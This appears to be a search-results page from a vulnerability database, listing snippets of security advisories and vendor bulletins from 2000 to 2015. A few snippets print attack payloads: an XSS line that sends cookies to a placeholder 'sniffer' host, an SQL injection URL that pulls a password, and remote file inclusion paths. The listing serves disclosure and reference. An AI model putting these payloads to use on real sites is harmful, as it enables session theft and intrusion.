Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2011/05/30 12:0 a.m.100 views

CSRF and XSS vulnerabilities in ADSL modem Callisto 821+

Hello 3APA3A! I want to warn you about security vulnerabilities in ADSL modem Callisto 821+ SI2000 Callisto821+ Router. These are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities. These attacks should be conducted on modem owner, which is logged into control panel. Taking into...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2010/12/09 12:0 a.m.100 views

Linux kernel exploit

Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux. Please read the header for an explanation of what's going on. Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- / Linux Kernel = 2.6.37 local privilege escalation by Dan Rosenberg...

6.2CVSS0.2AI score0.02655EPSS
Exploits11
securityvulns
securityvulns
added 2010/09/15 12:0 a.m.100 views

Microsoft Security Bulletin MS10-068 - Important Vulnerability in Local Security Authority Subsystem Service Could Allow Elevation of Privilege (983539)

Microsoft Security Bulletin MS10-068 - Important Vulnerability in Local Security Authority Subsystem Service Could Allow Elevation of Privilege 983539 Published: September 14, 2010 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability ...

9CVSS1.3AI score0.14361EPSS
Exploits0
securityvulns
securityvulns
added 2010/04/05 12:0 a.m.100 views

VUPEN Security Research - Sun Java JDK/JRE AWT Library Invalid Index Vulnerability

VUPEN Security Research - Sun Java JDK/JRE AWT Library Invalid Index Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems. It is the underlying technology that powers...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2008/10/29 12:0 a.m.100 views

Secunia Research: Trend Micro OfficeScan CGI Parsing Buffer Overflows

====================================================================== Secunia Research 22/10/2008 - Trend Micro OfficeScan CGI Parsing Buffer Overflows - ====================================================================== Table of Contents Affected...

10CVSS0.8AI score0.18406EPSS
Exploits6
securityvulns
securityvulns
added 2008/08/21 12:0 a.m.100 views

Null Byte Local file Inclusion in FAR - PHP Project version:1.0

. . | / | | | / / | |/ // / / / |/ / // | / | | / / / // / |/| || /| / / / / / / / / | | / / / | // est.2007 / / forum.darkc0de.com Web Application: FAR - PHP Project version:1.0 Vendor's Address :www.far-php.ro Author: Beenu Arora Address: www.beenuarora.com Python Dark Scripts:...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2008/08/04 12:0 a.m.100 views

America's army game server DoS

Invalid assert on network traffic parsing...

4AI score
Exploits0References1
securityvulns
securityvulns
added 2008/02/20 12:0 a.m.100 views

WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN Vendor: http://woltlab.de ::Proof of Concept http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC, SELECT password FROM wcf1user WHERE userID=1 AND...

Exploits0
securityvulns
securityvulns
added 2007/06/01 12:0 a.m.100 views

[ GLSA 200705-23 ] Sun JDK/JRE: Multiple vulnerabilities

Gentoo Linux Security Advisory GLSA 200705-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity:...

10CVSS7.2AI score0.18185EPSS
Exploits0
securityvulns
securityvulns
added 2007/05/19 12:0 a.m.100 views

[CVE-2007-1355] Tomcat documentation XSS vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-1355: Tomcat documentation XSS vulnerabilities Severity: Moderate Cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.23 Tomcat...

4.3CVSS0.5AI score0.58246EPSS
Exploits2
securityvulns
securityvulns
added 2007/04/19 12:0 a.m.100 views

Web Slider 0.6(path)Remote File Inclusion Vulnerabilities

Web Slider 0.6pathRemote File Inclusion Vulnerabilities D.Script: http://sourceforge.net/projects/webslider/ Discovered by: GolDM = Mahmoodali Homepage: http://Www.Tryag.Com/cc Exploit:Path/index.php?path=Shell Exploit:Path/modules/pdf.php?path=Shell Exploit:Path/plugins/highlight.php?path=Shell...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2007/04/13 12:0 a.m.100 views

[Full-disclosure] [OPENADS-SA-2007-003] Openads 2.0.11 vulnerability fixed

======================================================================== Openads security advisory OPENADS-SA-2007-003 ------------------------------------------------------------------------ Advisory ID: OPENADS-SA-2007-003 Date: 2007-Apr-11 Security risk: medium risk Applications affetced:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2007/01/09 12:0 a.m.100 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.8CVSS1.5AI score0.101EPSS
Exploits4References17Affected Software8
securityvulns
securityvulns
added 2006/10/21 12:0 a.m.100 views

[DRUPAL-SA-2006-024] Drupal 4.6.10 / 4.7.4 fixes multiple XSS issues

------------------------------------------------------------------------ ---- Drupal security advisory DRUPAL-SA-2006-024 ------------------------------------------------------------------------ ---- Project: Drupal core Date: 2006-Oct-18 Security risk: Moderately critical Exploitable from: Remot...

Exploits0
securityvulns
securityvulns
added 2006/07/25 12:0 a.m.100 views

XSS в Devium CMS 1.5

Advisory: XSS в Devium CMS 1.5 Home Page: http://www.devium.net/ Уязвимость/Vulnerability: XSS в гостевой книге. Exploit: scriptimg = new Image; img.src = "http://sniffer/a.jpg?"+document.cookie;/script Уязвимость/Vulnerability: Раскрытие установочного пути в админке:...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2006/07/24 12:0 a.m.100 views

VBZooM <=V1.11 "sub-join.php" SQL Injection

======================================= Discovered By: C.B.B.L CrAzY CrAcKeR,Breeeeh,BoNy-m,LiNuX rOOt ======================================= Search: POWERED BY VBZooM V1.11 Example:- /sub-join.php?UserID=SQL Injection...

2.8AI score
Exploits0
securityvulns
securityvulns
added 2004/12/17 12:0 a.m.100 views

iDEFENSE Security Advisory 12.16.04: MPlayer Bitmap Parsing Remote Heap Overflow Vulnerability

MPlayer Bitmap Parsing Remote Heap Overflow Vulnerability iDEFENSE Security Advisory 12.16.04 http://www.idefense.com/application/poi/display?id=168 December 16, 2004 I. BACKGROUND MPlayer is a movie player for Linux that also runs on many other Unices, and non- x86 CPUs. It plays most MPEG, VOB,...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2004/03/01 12:0 a.m.100 views

InnoMedia VideoPhone protection bypass

No description provided...

2.5AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2000/06/07 12:0 a.m.100 views

Security Bulletin (MS00-039)

Microsoft Security Bulletin MS00-039 - -------------------------------------- Patch Available for "SSL Certificate Validation" Vulnerabilities Originally posted: June 05, 2000 Summary ======= Microsoft has released a patch that eliminates two security vulnerabilities in Microsoftr Internet...

Exploits0
securityvulns
securityvulns
added 2000/04/03 12:0 a.m.100 views

Security Bulletin (MS00-022)

Patch Available for "XLM Text Macro" Vulnerability Originally Posted: April 03, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in Microsoftr Excel. The vulnerability could allow a macro to run without generating the expected security warning. Frequent...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2015/08/17 12:0 a.m.99 views

APPLE-SA-2015-08-13-3 iOS 8.4.1

APPLE-SA-2015-08-13-3 iOS 8.4.1 iOS 8.4.1 is now available and addresses the following: AppleFileConduit Available for: iPhone 4s and later, iPod touch 5th generation and later, iPad 2 and later Impact: A maliciously crafted afc command may allow access to protected parts of the filesystem...

9.3CVSS0.4AI score0.13322EPSS
Exploits5
securityvulns
securityvulns
added 2015/02/11 12:0 a.m.99 views

[SECURITY] [DSA 3155-1] postgresql-9.1 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3155-1 [email protected] http://www.debian.org/security/ Luciano Bello February 06, 2015 http://www.debian.org/security/faq -...

1.4AI score0.05533EPSS
Exploits0
securityvulns
securityvulns
added 2014/12/01 12:0 a.m.99 views

[ MDVSA-2014:237 ] perl-Mojolicious

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:237 http://www.mandriva.com/en/support/security/ Package : perl-Mojolicious Date : November 28, 2014 Affected: Business Server 1.0 Problem Description: Updated perl-Mojolicious package fixes security...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2014/09/21 12:0 a.m.99 views

Apple Mac OS X / OS X Server multiple security vulnerabilities

Privilege escalation, multiple memory corruptions on different formats parsing, information leakage, DoS, protection bypass, multiple vulnerabilities in 3rd parties components...

10CVSS2.8AI score0.99977EPSS
Exploits31References4Affected Software2
securityvulns
securityvulns
added 2014/05/15 12:0 a.m.99 views

[SECURITY] [DSA 2926-1] linux security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2926-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 12, 2014 http://www.debian.org/security/faq -...

7.2CVSS0.9AI score0.22475EPSS
Exploits14
securityvulns
securityvulns
added 2014/05/04 12:0 a.m.99 views

[SECURITY] [DSA 2888-1] ruby-actionpack-3.2 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2888-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff March 27, 2014 http://www.debian.org/security/faq -...

6.4CVSS1.6AI score0.207EPSS
Exploits3
securityvulns
securityvulns
added 2014/05/04 12:0 a.m.99 views

[USN-2172-1] CUPS vulnerability

========================================================================== Ubuntu Security Notice USN-2172-1 April 24, 2014 cups vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu...

4.3CVSS0.4AI score0.01626EPSS
Exploits0
securityvulns
securityvulns
added 2014/04/07 12:0 a.m.99 views

ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities

ESA-2014-009.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities EMC Identifier: ESA-2014-009 CVE Identifier: CVE-2011-1473, CVE-2014-0625, CVE-2014-0626, CVE-2014-0627 Severity Rating: CVSS v2 Base Score: See below for individual scores...

5CVSS0.5AI score0.67703EPSS
Exploits1
securityvulns
securityvulns
added 2014/03/13 12:0 a.m.99 views

USN-2126-1] PHP vulnerabilities

========================================================================== Ubuntu Security Notice USN-2126-1 March 03, 2014 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

6.8CVSS0.4AI score0.06732EPSS
Exploits3
securityvulns
securityvulns
added 2014/02/28 12:0 a.m.99 views

Barracuda Bug Bounty #36 Firewall - Client Side Exception Handling Web Vulnerability

Document Title: =============== Barracuda Bug Bounty 36 Firewall - Client Side Exception Handling Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1102 Barracuda Networks Security ID BNSEC: BNSEC-2398...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2014/02/11 12:0 a.m.99 views

Microsoft Windows multiple security vulnerabilities

XML services information leakage, IPv6 DoS, Direct2D memory corruption, .Net privilege escalation, VBScript code execution...

9.3CVSS3.1AI score0.69801EPSS
Exploits13Affected Software1
securityvulns
securityvulns
added 2014/02/10 12:0 a.m.99 views

[USN-2099-1] Perl vulnerability

========================================================================== Ubuntu Security Notice USN-2099-1 February 05, 2014 perl vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

7.5CVSS0.2AI score0.61604EPSS
Exploits13
securityvulns
securityvulns
added 2014/02/03 12:0 a.m.99 views

Multiple Vulnerabilities in Eventum

Advisory ID: HTB23198 Product: Eventum Vendor: Eventum Development Team Vulnerable Versions: 2.3.4 and probably prior Tested Version: 2.3.4 Advisory Publication: January 22, 2014 without technical details Vendor Notification: January 22, 2014 Vendor Patch: January 24, 2014 Public Disclosure:...

9.3CVSS0.2AI score0.10683EPSS
Exploits6
securityvulns
securityvulns
added 2013/12/23 12:0 a.m.99 views

[USN-2058-1] curl vulnerability

========================================================================== Ubuntu Security Notice USN-2058-1 December 18, 2013 curl vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

4CVSS0.6AI score0.02761EPSS
Exploits0
securityvulns
securityvulns
added 2013/05/06 12:0 a.m.99 views

[SQLi] vBilling for FreeSWITCH

vBilling for FreeSWITCH. http://blaszczakm.blogspot.com/2013/04/vbilling-freeswitch-sqli.html Michal Blaszczak 1 SQL Injection reset password any SIP account file: controllers/customer.php $sql2 = "UPDATE directoryparams SET paramvalue = '".$newpassword."' WHERE directoryid = '".$recordid."' "; 2...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2013/04/02 12:0 a.m.99 views

[USN-1784-1] libxslt vulnerability

========================================================================== Ubuntu Security Notice USN-1784-1 April 02, 2013 libxslt vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

5CVSS0.4AI score0.04286EPSS
Exploits1
securityvulns
securityvulns
added 2013/02/04 12:0 a.m.99 views

[KIS-2013-01] DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability

------------------------------------------------------------------ DataLife Engine 9.7 preview.php PHP Code Injection Vulnerability ------------------------------------------------------------------ • Software Link: http://dleviet.com/ • Affected Version: 9.7 only. • Vulnerability Description: Th...

7.5CVSS0.3AI score0.40465EPSS
Exploits9
securityvulns
securityvulns
added 2012/12/11 12:0 a.m.99 views

Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework

Advisory ID: HTB23127 Product: Smartphone Pentest Framework SPF Vendor: Bulb Security LLC Vulnerable Versions: 0.1.3, 0.1.4 and probably prior Tested Versions: 0.1.3, 0.1.4 Vendor Notification: November 19, 2012 Public Disclosure: December 10, 2012 Vulnerability Type: OS Command Injection CWE-78...

6.8CVSS0.6AI score0.09296EPSS
Exploits5
securityvulns
securityvulns
added 2012/11/02 12:0 a.m.99 views

PrestaShop <= 1.5.1 Persistent XSS

PrestaShop = 1.5.1 Persistent XSS Tested under: Firefox, Chrome and Safari latest versions Discover Credits: David Sopas - [email protected] | @dsopas | davidsopas.com/labs Original link: http://davidsopas.com/labs/prestashopxss.txt Description: PrestaShop is the most reliable and flexible...

6.3AI score
Exploits0
securityvulns
securityvulns
added 2012/10/05 12:0 a.m.99 views

[security bulletin] HPSBMU02815 SSRT100715 rev.3 - HP SiteScope SOAP Security Issues, Remote Disclosure of Information, Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03489683 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03489683 Version: 3 HPSBMU02815...

10CVSS0.5AI score0.6022EPSS
Exploits6
securityvulns
securityvulns
added 2012/07/23 12:0 a.m.99 views

WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities

Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-015 Author: Stefan Schurtz Affected Software: Successfully tested on 'Count Per Day' 3.1.1 Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day Vendor Status: fixed...

5.8AI score
Exploits0
securityvulns
securityvulns
added 2012/06/13 12:0 a.m.99 views

ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-090 June 8, 2012 - -- CVE ID: CVE-2012-0297 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected...

10CVSS0.72596EPSS
Exploits22
securityvulns
securityvulns
added 2012/04/23 12:0 a.m.99 views

Microsoft Windows multiple security vulnerabilities

MSCOMCTL.ocx code execution, .Net code execution, WinVerifyTrust digital signature validation vulnerability...

9.3CVSS2.7AI score0.99966EPSS
Exploits14References1Affected Software1
securityvulns
securityvulns
added 2012/03/19 12:0 a.m.99 views

Brute Force и XSS уязвимости в Webglimpse

Здравствуйте 3APA3A! После предыдущих многочисленных Cross-Site Scripting, Full path disclosure, Directory Traversal и Authorization bypass уязвимостей в Webglimpse SecurityVulns ID: 9436, 9443, 9778, 9876, сообщаю вам о найденных мною новых уязвимостях в Webglimpse. Это Brute Force и Cross-Site...

6.4AI score
Exploits0
securityvulns
securityvulns
added 2012/03/18 12:0 a.m.99 views

Cisco Security Advisory: Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability Advisory ID: cisco-sa-20120314-fwsm Revision 1.0 For Public Release 2012 March 14 16:00 UTC GMT...

7.8CVSS0.7AI score0.02076EPSS
Exploits0
securityvulns
securityvulns
added 2011/12/05 12:0 a.m.99 views

MVSA-11-013 - EllisLab xss_clean Filter Bypass - ExpressionEngine and CodeIgniter

CVE: CVE-2011-4025 Vendor: EllisLab Products: ExpressionEngine 2.2.2, CodeIgniter 2.0.3 Vulnerabilities: xssclean filter bypass, leading to Cross-Site Scripting XSS Risk: High Attack Vector: From Remote Reference: http://secureappdev.blogspot.com/2011/11/ellislab-xssclean-filter-bypass.html 1...

0.2AI score
Exploits2
securityvulns
securityvulns
added 2011/10/20 12:0 a.m.99 views

ZDI-11-290 : Microsoft Internet Explorer SetExpandedClipRect Remote,Code Execution Vulnerability

ZDI-11-290 : Microsoft Internet Explorer SetExpandedClipRect Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-290 October 15, 2011 - -- CVE ID: CVE-2011-2001 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Microsoft - -- Affected Products:...

9.3CVSS0.4AI score0.71802EPSS
Exploits5
securityvulns
securityvulns
added 2011/09/09 12:0 a.m.99 views

Security bypass vulnerability in MyBB

Hello 3APA3A! I want to warn you about security bypass vulnerability in MyBB, which allows to bypass protection against Brute Force and conduct Brute Force attacks. In August in my article Bypassing captchas and blocking at web sites http://websecurity.com.ua/5334/ I wrote about vulnerability in...

Exploits0
securityvulns
securityvulns
added 2011/08/01 12:0 a.m.99 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

8.3CVSS1.6AI score0.10046EPSS
Exploits7References29Affected Software9
securityvulns
securityvulns
added 2011/06/29 12:0 a.m.99 views

Multiple vulnerabilities in Open-Realty

Vulnerability ID: HTB23023 Reference: http://www.htbridge.ch/advisory/multiplevulnerabilitiesinopenrealty.html Product: Open-Realty Vendor: Transparent Technologies, Inc. http://www.open-realty.org/ Vulnerable Version: 3.1.5 and probably prior Tested on: 3.1.5 Vendor Notification: 07 June 2011...

0.2AI score
Exploits0
Total number of security vulnerabilities5000